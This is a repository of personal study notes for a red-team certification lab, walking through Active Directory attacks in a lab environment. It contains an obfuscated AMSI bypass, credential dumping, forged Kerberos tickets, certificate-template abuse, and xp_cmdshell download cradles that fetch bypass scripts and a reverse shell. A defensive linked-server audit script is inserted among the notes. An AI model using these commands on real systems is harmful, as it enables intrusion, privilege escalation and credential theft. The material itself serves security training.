S`eT-It`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( Get-varI`A`BLE ( ('1Q'+'2U') +'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )
```

- Transfer `PowerView` to the **Jenkins** instance
- Make sure to host `PowerView.ps1` on **HFS**

```powershell
PS C:\Users\Administrator\.jenkins\workspace\Projectx> iex ((New-Object Net.WebClient).DownloadString('http://172.16.100.X/PowerView.ps1'))
```

- Configure **Resource-Based Constrained Delegation** (RBCD) on `dcorp-mgmt` so that your student VM's machine account can delegate to it (you could do the same for all the student VMs in the lab):

```powershell
PS C:\Users\Administrator\.jenkins\workspace\Projectx> Set-DomainRBCD -Identity dcorp-mgmt -DelegateFrom 'dcorp-stdX$' -Verbose
```

- Check if RBCD is set correctly:

```powershell
PS C:\Users\Administrator\.jenkins\workspace\Projectx> Get-DomainRBCD
```

![](https://i.imgur.com/N5ct63j.png)

- Get the AES keys of your student VM (as we configured RBCD for it above)
- Run the below command from a new command prompt with elevated privileges:

```powershell
C:\AD\Tools\Loader.exe -Path C:\AD\Tools\SafetyKatz.exe -Command "sekurlsa::ekeys" "exit"
```

![](https://i.imgur.com/yiMBe7G.png)

- With `Rubeus`, abuse the RBCD to access `dcorp-mgmt` as Domain Administrator - Administrator
- Also do this in the newly spawned process

```powershell
C:\AD\Tools\Rubeus.exe s4u /user:dcorp-student505$ /aes256:f1f7973b711431dd18fa189632d5a99dfd2ac53520f0acc94be75d55cd236535 /msdsspn:http/dcorp-mgmt /impersonateuser:administrator /ptt
```

- Check if we can access `dcorp-mgmt`:

```powershell
winrs -r:dcorp-mgmt cmd
```

![](https://i.imgur.com/WFCFcrG.png)

> [!bug] **Learning Objective 18**
> - Using DA access to `dollarcorp.moneycorp.local`, escalate privileges to Enterprise Admin or DA to the parent domain, `moneycorp.local`, using the domain trust key.
> # Solution -:

### **Step 1 - Retrieve Trust Key for the dollarcorp and moneycorp Trust using Mimikatz or SafetyKatz**

- Start a process with DA privileges (run the command from an elevated prompt):

```powershell
C:\AD\Tools\Rubeus.exe asktgt /user:svcadmin /aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt
```

**_Using `SafetyKatz.exe` -:_**

Execute the following commands from the process running as Domain Admin to copy `Loader.exe` to **dcorp-dc** and use it to extract credentials. Note that the trust key may be different in your lab instance:

```powershell
# Copy Loader.exe to dcorp-dc
echo F | xcopy C:\AD\Tools\Loader.exe \\dcorp-dc\C$\Users\Public\Loader.exe /Y

# Spawn an interactive shell on dcorp-dc
winrs -r:dcorp-dc cmd

# Set up port forwarding on dcorp-dc: local port 8080 -> port 80 (HFS) on your student VM
netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=172.16.100.X

# Use Loader.exe to fetch SafetyKatz.exe through the port forward and run it in memory on dcorp-dc
# Make sure to host SafetyKatz.exe on HFS first
C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe

# Extract credentials in the new mimikatz session
lsadump::trust /patch
```

![](https://i.imgur.com/M3Jt8fB.png)

### **Step 2 - Use the extracted information to forge a ticket**

- Forge a ticket with SID History of Enterprise Admins. Run the below command from an elevated command prompt:

```powershell
C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /sids:S-1-5-21-335606122-960912869-3279953914-500 /rc4:a9c7b4087bf715f859361ad3c3331488 /service:krbtgt /target:moneycorp.local /ticket:C:\AD\Tools\trust_tkt.kirbi" "exit"
```

> [!note] In case you don't know the `/sids:` value for the enterprise admin, we talked about it earlier during **Enumeration**, so check your bookmark 🤪

- Use the ticket with Rubeus:

```powershell
C:\AD\Tools\Rubeus.exe asktgs /ticket:C:\AD\Tools\trust_tkt.kirbi /service:cifs/mcorp-dc.moneycorp.local /dc:mcorp-dc.moneycorp.local /ptt
```

### **Step 3 - Try to access the file system of the Enterprise Admin domain controller (`mcorp-dc`)**

- Check if we can access the file system on `mcorp-dc`!

```powershell
dir \\mcorp-dc.moneycorp.local\c$
```

![](https://i.imgur.com/5mriKLe.png)

> [!bug] **Learning Objective 19**
> - Using DA access to `dollarcorp.moneycorp.local`, escalate privileges to Enterprise Admin or DA to the parent domain, `moneycorp.local`, using **dollarcorp's** krbtgt hash.
> # Solution -:

- We already have the krbtgt hash from **dcorp-dc** from the `DCSync` attack. Let's create the inter-realm TGT and inject it. Run the below command from an elevated command prompt:

```powershell
C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /sids:S-1-5-21-335606122-960912869-3279953914-500 /krbtgt:4e9815869d2090ccfca61c1fe0d23986 /ptt" "exit"
```

- Let's check if we can access `mcorp-dc` -:

```powershell
dir \\mcorp-dc.moneycorp.local\c$
```

![](https://i.imgur.com/TWKp7Qz.png)

- Let's run DCSync against `mcorp-dc` to extract secrets from it:

```powershell
C:\AD\Tools\SafetyKatz.exe "lsadump::dcsync /user:mcorp\krbtgt /domain:moneycorp.local" "exit"
```

**_Output -:_**

```
** SAM ACCOUNT **

SAM Username : krbtgt
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )
Account expiration :
Password last change : 11/11/2022 9:46:24 PM
Object Security ID : S-1-5-21-335606122-960912869-3279953914-502
Object Relative ID : 502

Credentials:
Hash NTLM: a0981492d5dfab1ae0b97b51ea895ddf
ntlm- 0: a0981492d5dfab1ae0b97b51ea895ddf
lm - 0: 87836055143ad5a507de2aaeb9000361

Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : 7c7a5135513110d108390ee6c322423f

* Primary:Kerberos-Newer-Keys *
Default Salt : MONEYCORP.LOCALkrbtgt
Default Iterations : 4096
Credentials
aes256_hmac (4096) : 90ec02cc0396de7e08c7d5a163c21fd59fcb9f8163254f9775fc2604b9aedb5e
aes128_hmac (4096) : 801bb69b81ef9283f280b97383288442
des_cbc_md5 (4096) : c20dc80d51f7abd9
```

> [!bug] **Learning Objective 20**
> - With DA privileges on `dollarcorp.moneycorp.local`, get access to `SharedwithDCorp` share on the DC of `eurocorp.local` forest.
> # Solution -:

**We first need to retrieve the trust key for the dollarcorp and eurocorp trust using Mimikatz or SafetyKatz**

- Start a process with DA privileges. Run the command from an elevated command prompt:

```powershell
C:\AD\Tools\Rubeus.exe asktgt /user:svcadmin /aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt
```

- Run the below commands from the process running as DA to copy `Loader.exe` to **dcorp-dc** and use it to extract credentials. Note that the trust key may be different in your lab instance:

```powershell
# Copy Loader.exe to dcorp-dc
echo F | xcopy C:\AD\Tools\Loader.exe \\dcorp-dc\C$\Users\Public\Loader.exe /Y

# Get an interactive shell
winrs -r:dcorp-dc cmd

# Enable port forwarding on dcorp-dc: local port 8080 -> port 80 (HFS) on your student VM
netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=172.16.100.x

# Make sure to host SafetyKatz.exe on HFS
C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe

# Extract credentials in the new mimikatz session
lsadump::trust /patch
```

**_Example -:_**

![](https://i.imgur.com/qORWHVc.png)

> [!note] Make sure you don't make the mistake of copying the trust key (rc4_hmac_nt) of `MONEYCORP.LOCAL` instead of `EUROCORP.LOCAL` for "`/rc4:`" in the command below; scrolling down a little in the command output will help
2540 | 2541 | - Forge an inter-realm **TGT**. Run command from an elevated command prompt 2542 | 2543 | 2544 | ```powershell 2545 | C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /rc4:ed74fa2b5cfd5ab0fb7ace3d8a7b6c04 /service:krbtgt /target:eurocorp.local /ticket:C:\AD\Tools\trust_forest_tkt.kirbi" "exit" 2546 | ``` 2547 | 2548 | 2549 | 2550 | 2551 | - Now Use the ticket with `Rubeus`: 2552 | 2553 | 2554 | 2555 | 2556 | 2557 | ```powershell 2558 | C:\AD\Tools\Rubeus.exe asktgs /ticket:C:\AD\Tools\trust_forest_tkt.kirbi /service:cifs/eurocorp-dc.eurocorp.local /dc:eurocorp-dc.eurocorp.local /ptt 2559 | ``` 2560 | 2561 | 2562 | 2563 | 2564 | 2565 | - Now Check if we can access explicitly shared resources `eurocorp-dc` 2566 | 2567 | 2568 | ```powershell 2569 | dir \\eurocorp-dc.eurocorp.local\SharedwithDCorp\ 2570 | ``` 2571 | 2572 | 2573 | 2574 | **_Example_** 2575 | 2576 | 2577 | ![](https://i.imgur.com/2aCMqVc.png) 2578 | 2579 | 2580 | 2581 | > [!hint] You can also use `Invoke-Mmimkatz` and `old Kekeo`, check lab manual as i won't discuss here 2582 | 2583 | 2584 | > [!bug] **Learning Objective 21** 2585 | > - Check if AD CS is used by the target forest and find any vulnerable/abusable templates. 2586 | > - Abuse any such template(s) to escalate to Domain Admin and Enterprise Admin. 2587 | > # Solution -: 2588 | 2589 | 2590 | ### **Enumerate Templates** 2591 | 2592 | 2593 | - We can use the `Certify` tool to check for **AD CS** in `moneycorp`. 2594 | 2595 | 2596 | ```powershell 2597 | C:\AD\Tools\Certify.exe cas 2598 | ``` 2599 | 2600 | 2601 | 2602 | 2603 | 2604 | **_Important Output_** 2605 | 2606 | 2607 | 2608 | 2609 | ![](https://i.imgur.com/2sHEFFu.png) 2610 | 2611 | 2612 | - We can list all the templates using the following command. 
Going through the output, we can find some interesting templates.

```powershell
C:\AD\Tools\Certify.exe find
```

**_Important Output_**

![](https://i.imgur.com/X39odqU.png)

> [!note] The template `HTTPSCertificates` allows enrollment by the `RDPUsers` group, which we have access to.

## **Privilege Escalation to DA and EA using `ESC1`**

### **Domain Admin**

- `HTTPSCertificates` looks interesting. Let's get some more information about it, as it allows the requestor to supply the subject name:

```powershell
C:\AD\Tools\Certify.exe find /enrolleeSuppliesSubject
```

**_Important Output_**

![](https://i.imgur.com/VJtq7Oe.png)

> [!note] Sweet! The `HTTPSCertificates` template grants enrollment rights to the `RDPUsers` group and allows the requestor to supply a Subject Name. Recall that `studentx` is a member of the `RDPUsers` group. This means that we can request a certificate for any user as `studentx`.

- Request a certificate for the Domain Admin `Administrator`:

```powershell
C:\AD\Tools\Certify.exe request /ca:mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA /template:"HTTPSCertificates" /altname:administrator
```

> [!note]
> Copy all the text between `-----BEGIN RSA PRIVATE KEY-----` and `-----END CERTIFICATE-----` and save it to `esc1.pem`.

- Convert the obtained credentials to `PFX` format using the `openssl` binary on the student VM, using `SecretPass` as the export password.
- Note that you have to type the password manually.

```powershell
C:\AD\Tools\openssl\openssl.exe pkcs12 -in C:\AD\Tools\esc1.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out C:\AD\Tools\esc1-DA.pfx
```

- Use the `PFX` created above with `Rubeus` to request a TGT for the DA `Administrator`:

```powershell
C:\AD\Tools\Rubeus.exe asktgt /user:administrator /certificate:esc1-DA.pfx /password:SecretPass /ptt
```

**_Example_**

![](https://i.imgur.com/5UhVvcu.png)

- Check if we actually have DA privileges now:

```powershell
winrs -r:dcorp-dc whoami
```

**_Example_**

![](https://i.imgur.com/efsSAKN.png)

### **Enterprise Admin**

- We can use a similar method to escalate to Enterprise Admin privileges. Request a certificate for the Enterprise Administrator `Administrator`:

```powershell
C:\AD\Tools\Certify.exe request /ca:mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA /template:"HTTPSCertificates" /altname:moneycorp.local\administrator
```

> [!note]
> Note the difference in `/altname`. Then save the certificate as before, this time as `esc1-EA.pem`.

- Now convert it to `PFX`.
I will use `SecretPass` as the export password.
- Don't forget to type the password manually.

```powershell
C:\AD\Tools\openssl\openssl.exe pkcs12 -in C:\AD\Tools\esc1-EA.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out C:\AD\Tools\esc1-EA.pfx
```

- Use `Rubeus` to request a TGT for the Enterprise Administrator `Administrator`:

```powershell
C:\AD\Tools\Rubeus.exe asktgt /user:moneycorp.local\Administrator /dc:mcorp-dc.moneycorp.local /certificate:esc1-EA.pfx /password:SecretPass /ptt
```

**_Example_**

![](https://i.imgur.com/fj7iPVu.png)

- Finally, access `mcorp-dc`!

```powershell
winrs -r:mcorp-dc cmd
```

**_Example_**

![](https://i.imgur.com/bbr0YzC.png)

> [!tip] To learn how to do **Privilege Escalation to DA and EA using `ESC3` and `ESC6`**, check the lab manual. I only practiced it but did not take notes; in the exam lab, make sure to refer to the lab manual and check both of them.

> [!bug] **Learning Objective 22**
> - Get a reverse shell on a SQL server in the eurocorp forest by abusing database links from dcorp-mssql.
> # Solution -:

**We start by enumerating SQL servers in the domain and checking whether `studentx` has privileges to connect to any of them.
We can use the `PowerUpSQL` module for that.**

- Start a session with `invisi-shell`:

```powershell
C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
```

- Load `PowerUpSQL`:

```powershell
Import-Module C:\AD\Tools\PowerUpSQL-master\PowerUpSQL.psd1
```

- Now enumerate `SQL` servers:

```powershell
Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose
```

![](https://i.imgur.com/4HTrzoo.png)

- We can then use `Get-SQLServerLinkCrawl` to crawl the database links automatically:

```powershell
Get-SQLServerLinkCrawl -Instance dcorp-mssql.dollarcorp.moneycorp.local -Verbose
```

![](https://i.imgur.com/woeljrx.png)

**Sweet! We have `sysadmin` set to `1`, which means `True`, on the `eu-sql33` server!**

- Let's try to get command execution on `eu-sql33`:

```powershell
# -Instance    : the first SQL instance in the chain
# -Query       : command to run
# -QueryTarget : our target, on which all conditions are met

Get-SQLServerLinkCrawl -Instance dcorp-mssql -Query "exec master..xp_cmdshell 'whoami'" -QueryTarget eu-sql33
```

**_Example Output_**

![](https://i.imgur.com/AK0H9dV.png)

- Let's try to execute a PowerShell download-execute cradle to run a PowerShell reverse shell on the `eu-sql33` instance.
Remember to start a listener.
- Make sure to start your **HFS** first and upload the files `sbloggingbypass.txt`, `amsibypass.txt` and `Invoke-PowerShellTcpEx.ps1` in order to host them.

```powershell
Get-SQLServerLinkCrawl -Instance dcorp-mssql -Query 'exec master..xp_cmdshell ''powershell -c "iex (iwr -UseBasicParsing http://172.16.100.5/sbloggingbypass.txt);iex (iwr -UseBasicParsing http://172.16.100.5/amsibypass.txt);iex (iwr -UseBasicParsing http://172.16.100.5/Invoke-PowerShellTcpEx.ps1)"''' -QueryTarget eu-sql33
```

**_Example Output_**

![](https://i.imgur.com/JlCEJkl.png)

--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# CRTP-Notes
My notes containing the **Certified Red Team Professional** Course. This **Repository** will be updated frequently as I move on with the course. So help me **God** 📿

![image](https://github.com/sec-fortress/CRTP-Notes/assets/132317714/9f4a1a4b-9b20-472f-9fac-dbe6edf079bc)

**Glory be to God for the completion of this certification, GG :)**
--------------------------------------------------------------------------------
/Trust Abuse.md:
--------------------------------------------------------------------------------

# **MSSQL Servers**

- MS SQL servers are generally deployed in plenty in a Windows domain.
- SQL Servers provide very good options for lateral movement as domain users can be mapped to database roles.
- For MSSQL and PowerShell hackery, let's use PowerUpSQL: https://github.com/NetSPI/PowerUpSQL

**_Examples_**

- Discovery (SPN scanning):

```powershell
Get-SQLInstanceDomain
```

- Check accessibility:

```powershell
Get-SQLConnectionTestThreaded

Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -Verbose
```

![](https://i.imgur.com/GvA1sd2.png)

- Gather information:

```powershell
Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose
```

![](https://i.imgur.com/9SWwFqr.png)

> If, after running the above command, you see that `IsSysadmin` is set to **No**, as an attacker you shouldn't lose interest, because we can still extract information.

# **MSSQL Servers - Database Links**

- A database link allows a SQL Server to access external data sources like other SQL Servers and OLE DB data sources.
- In the case of database links between SQL servers, that is, linked SQL servers, it is possible to execute stored procedures.
- Database links work even across forest trusts.
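The link crawl in the Learning Objective 22 solution above and the database-link examples in this section both depend on two per-instance settings: how each link's login mapping is configured, and whether `xp_cmdshell` is enabled. As an added defensive audit example, not part of these notes or of PowerUpSQL, the following PowerShell function reads both from one instance with `System.Data.SqlClient`; it assumes Windows-integrated authentication, and the `dcorp-mssql` instance name is taken from the notes.

```powershell
# Added audit example (not from the course notes or PowerUpSQL). Connects to one SQL
# Server instance with the caller's Windows credentials and reports what the link crawl
# depends on: links whose login mapping gives every caller a fixed remote login, and xp_cmdshell.
function Get-LinkedServerAudit {
    param([Parameter(Mandatory)][string]$Instance)   # e.g. 'dcorp-mssql' from the notes
    # sys.linked_logins: local_principal_id 0 is the mapping for every login without an explicit
    # entry; uses_self_credential = 0 with remote_name set is a fixed remote credential.
    $linkQuery = @"
SELECT s.name AS LinkName, s.data_source AS DataSource, s.is_rpc_out_enabled AS RpcOut,
       ll.local_principal_id AS LocalPrincipalId, ll.uses_self_credential AS UsesSelf,
       ll.remote_name AS RemoteLogin
FROM sys.servers AS s
LEFT JOIN sys.linked_logins AS ll ON ll.server_id = s.server_id
WHERE s.is_linked = 1;
"@
    $cmdShellQuery = "SELECT value_in_use FROM sys.configurations WHERE name = 'xp_cmdshell';"
    $connString = "Server=$Instance;Integrated Security=SSPI;Encrypt=False;Connection Timeout=5"
    $conn = New-Object System.Data.SqlClient.SqlConnection($connString)
    $conn.Open()
    try {
        $cmd = $conn.CreateCommand()
        $cmd.CommandText = $cmdShellQuery
        $xpCmdShell = [int]$cmd.ExecuteScalar()          # 1 = xp_cmdshell enabled
        $cmd.CommandText = $linkQuery
        $links = New-Object System.Data.DataTable
        $adapter = New-Object System.Data.SqlClient.SqlDataAdapter($cmd)
        $null = $adapter.Fill($links)
    } finally { $conn.Close() }

    foreach ($row in $links.Rows) {
        $fixedLogin   = ($row.UsesSelf -eq $false) -and ([string]$row.RemoteLogin -ne '')
        $appliesToAll = ($row.LocalPrincipalId -eq 0)   # mapping applies to all local logins
        [pscustomobject]@{
            Instance          = $Instance
            LinkName          = $row.LinkName
            DataSource        = $row.DataSource
            RpcOutEnabled     = [bool]$row.RpcOut        # RPC Out lets a procedure run over the link
            FixedRemoteLogin  = [string]$row.RemoteLogin
            Finding           = $(if ($fixedLogin -and $appliesToAll) { 'HIGH: every caller traverses the link as the fixed login' }
                                  else { 'review: self-mapped, per-principal or no mapping' })
            XpCmdShellEnabled = ($xpCmdShell -eq 1)
        }
    }
}

# Remediation: map links to least-privileged remote logins and, where it is not needed,
# run sp_configure 'xp_cmdshell', 0 followed by RECONFIGURE on the instance.
Get-LinkedServerAudit -Instance 'dcorp-mssql' | Format-Table -AutoSize
```

Run it against each instance the crawl reaches; a HIGH finding on a link whose remote login is `sysadmin` is exactly the condition the `Get-SQLServerLinkCrawl` output flags with `sysadmin = 1`.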
![](https://i.imgur.com/A5hBH7R.png)

**_Examples_**

- Searching database links
  - Look for links to remote servers:

```powershell
Get-SQLServerLink -Instance dcorp-mssql -Verbose
```

OR

```sql
select * from master..sysservers
```

![](https://i.imgur.com/sK1jStA.png)

> Data is accessible via the `DCORP-SQL1` link; this is what we want.

- Enumerating database links:

```powershell
Get-SQLServerLinkCrawl -Instance dcorp-mssql -Verbose
```

![](https://i.imgur.com/xr7rwLQ.png)

- Executing commands
  - Use the `-QueryTarget` parameter to run the query on a specific instance (without `-QueryTarget` the command tries to use `xp_cmdshell` on every link of the chain):

```powershell
Get-SQLServerLinkCrawl -Instance dcorp-mssql -Query "exec master..xp_cmdshell 'whoami'" -QueryTarget eu-sql
```

![](https://i.imgur.com/AhAmeLt.png)

- Gain a reverse shell instead of plain RCE:

```powershell
Get-SQLServerLinkCrawl -Instance dcorp-mssql -Query 'exec master..xp_cmdshell ''powershell -c "iex (iwr -UseBasicParsing http://172.16.100.1/sbloggingbypass.txt);iex (iwr -UseBasicParsing http://172.16.100.1/amsibypass.txt);iex (iwr -UseBasicParsing http://172.16.100.1/Invoke-PowerShellTcpEx.ps1)"''' -QueryTarget eu-sql
```

> Make sure to start your **HTTP File Server (HFS)** first and upload the files `sbloggingbypass.txt`, `amsibypass.txt` and `Invoke-PowerShellTcpEx.ps1` in order to host them.

# **Learning Objective 22**

- Get a reverse shell on a SQL server in the eurocorp forest by abusing database links from dcorp-mssql.
## **Solution**

**_Coming Soon_**

# **References**

- https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/abusing-ad-mssql
- https://www.powershellgallery.com/

--------------------------------------------------------------------------------